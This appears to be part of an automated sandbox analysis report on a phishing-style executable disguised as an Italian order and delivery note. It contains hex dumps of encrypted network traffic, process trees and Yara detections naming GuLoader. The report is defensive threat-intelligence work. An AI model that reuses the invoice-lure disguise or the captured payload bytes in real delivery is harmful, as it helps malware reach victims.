                                              2021-11-25 09:47:52 UTC86INData Raw: 73 ad ca 67 5f 89 6e b0 58 4b ab 48 b2 9d e7 cd 02 0f 42 25 e3 92 6c db f2 bd 6d 48 1f a3 fd 01 cc 46 e9 ee 37 3d 65 62 e1 a5 a1 e0 ca 5e c4 f1 d0 62 73 70 23 cd df 67 f7 bb 3d cf e4 a1 ef 79 7a cf b1 93 46 6a 9f 81 97 b6 55 dc 70 be 1e 3c 19 8a bc 32 73 20 41 47 80 c7 01 4f a2 1c 17 df 76 77 48 5e 7e ff 2d 74 f1 10 f5 e0 b3 56 96 3f e2 ce ca fa 90 d6 72 04 fa bd 0c e7 ca f8 e3 1a 63 65 92 be 85 07 55 ec 58 a7 f0 67 fc 16 36 08 21 eb 35 f1 bf b9 19 6a 58 cc 67 60 47 75 97 0b cb d5 3a 91 f6 55 7d 95 c9 f3 9c 89 3c 5a 57 20 0c 1c 04 df 04 f6 ae 00 13 f4 58 a1 61 41 31 aa e6 ec e3 e6 25 b3 df 12 57 2a 6f 58 2f 44 1f 94 c3 91 2c 7a ef 01 29 2a f0 76 ee d7 82 64 9a 2f cc d0 07 eb 5d ab 13 5f ce d3 b3 a1 84 29 fe 84 d0 50 49 d2 29 41 0e 39 74 fa da 4b c9 cf c9
                                              Data Ascii: sg_nXKHB%lmHF7=eb^bsp#g=yzFjUp<2s AGOvwH^~-tV?rceUXg6!5jXg`Gu:U}<ZW XaA1%W*oX/D,z)*vd/]_)PI)A9tK
                                              2021-11-25 09:47:52 UTC94INData Raw: 38 c2 62 6a 78 bf 57 ca 9f 56 1a 1d a0 81 fe b9 8f d3 d1 3c b0 67 2d 99 01 e8 d3 dd 22 89 de 58 13 ec 12 f5 94 82 86 57 55 7b 71 55 96 67 08 6e df 24 69 d3 80 6c df e8 2e 26 af df 28 ed 2b 4b 07 97 71 0c b7 e0 de 72 61 a1 5d 2d f7 d8 77 05 c4 15 2d 20 be 9f 58 30 14 93 63 9f c8 e4 fc f2 47 03 9e d7 e9 4f 49 b6 42 a6 97 73 3f e5 1d 2b d2 3a 87 20 dc a4 95 6b 95 36 1e 2d 6b 10 a8 20 c9 b9 6a 89 12 ce 34 fa 87 59 a8 9c af ad af 41 a4 e3 be 64 b8 7e 12 34 73 46 31 c8 fc 25 ba 83 2e 2b c6 f9 4d 03 d4 23 76 12 f5 92 f0 bf 80 8a 7c a4 4a 2c 01 6b cc 90 bf f7 58 93 09 70 3d da a3 7e 8d 01 13 85 c7 30 1c 77 d8 41 9f ec b9 f9 86 8e d7 01 58 83 56 da 70 af 42 96 56 a9 0f 35 1a f9 2e ad d7 e2 70 f1 90 e5 9b 52 9b 10 14 04 69 60 74 f5 46 de fb dc 17 05 30 4f b9 e4 7d
                                              Data Ascii: 8bjxWV<g-"XWU{qUgn$il.&(+Kqra]-w- X0cGOIBs?+: k6-k j4YAd~4sF1%.+M#v|J,kXp=~0wAXVpBV5.pRi`tF0O}
                                              2021-11-25 09:47:52 UTC101INData Raw: d5 46 d7 d1 46 94 d0 92 77 10 e2 fd f5 a5 fd b0 de ff 7a 77 a7 0a cc 8e f9 2d f1 88 2c 45 69 26 80 c1 6e 36 54 aa fe ea bd 5a e2 b1 e0 ee 1f ba 10 56 c7 43 ac 34 ad 34 59 ee 48 0e c3 7d 0d 05 a2 13 63 8e ce 9e c8 cf 18 1f eb 6a 4b ef 6d 09 e9 e5 b1 f1 28 a7 48 17 a8 bb 4a bb 36 df 7d 4a ce 94 c5 e8 9c 2b eb 72 f8 2c 83 00 a9 96 2e b6 19 36 be 7f ef f9 c7 54 39 54 16 56 e6 78 ff 30 e7 d5 19 fd 07 41 ba c5 7e a9 7f bf 28 6c 89 5d 36 40 d6 e3 03 90 1c 53 9f 71 9d 0c ca 46 b0 8b 70 8e 5f 13 fc 6f dc fd 80 5c c6 72 3d f5 2e 48 ea a8 4b c9 c2 b6 a2 ed 28 13 4d f4 4d 51 bd d5 2b ff 29 7f 3b 02 6f de 46 ea d6 2e d0 e2 f8 59 44 16 d1 d5 f8 bf e2 51 15 7f 02 9d 5f cc 79 99 25 a2 a6 96 9f d6 0d 4d 91 fa b0 0b 0c f5 60 ae f3 55 8e 49 ad 73 c8 ca 47 5f ca 6e df 58 26
                                              Data Ascii: FFwzw-,Ei&n6TZVC44YH}cjKm(HJ6}J+r,.6T9TVx0A~(l]6@SqFp_o\r=.HK(MMQ+);oF.YDQ_y%M`UIsG_nX&


                                              Code Manipulations

                                              Statistics

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              Analysis Process: ORDINE + DDT A.M.F SpA.exe PID: 4632 Parent PID: 5216

                                              General

                                              Start time:10:47:06
                                              Start date:25/11/2021
                                              Path:C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe"
                                              Imagebase:0x400000
                                              File size:164928 bytes
                                              MD5 hash:F5423B7A89876044078CBB68DB883AF8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:Visual Basic
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Author: Joe Security
                                              Reputation:low

                                              Analysis Process: ORDINE + DDT A.M.F SpA.exe PID: 8108 Parent PID: 4632

                                              General

                                              Start time:10:47:28
                                              Start date:25/11/2021
                                              Path:C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe"
                                              Imagebase:0x400000
                                              File size:164928 bytes
                                              MD5 hash:F5423B7A89876044078CBB68DB883AF8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000008.00000000.238036448865.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
                                              Reputation:low

                                              Analysis Process: lsass.exe PID: 120 Parent PID: 8108

                                              General

                                              Start time:10:47:56
                                              Start date:25/11/2021
                                              Path:C:\Windows\System32\lsass.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\lsass.exe
                                              Imagebase:0x7ff71ff40000
                                              File size:59448 bytes
                                              MD5 hash:15A556DEF233F112D127025AB51AC2D3
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              Disassembly

                                              Code Analysis

                                              Reset < >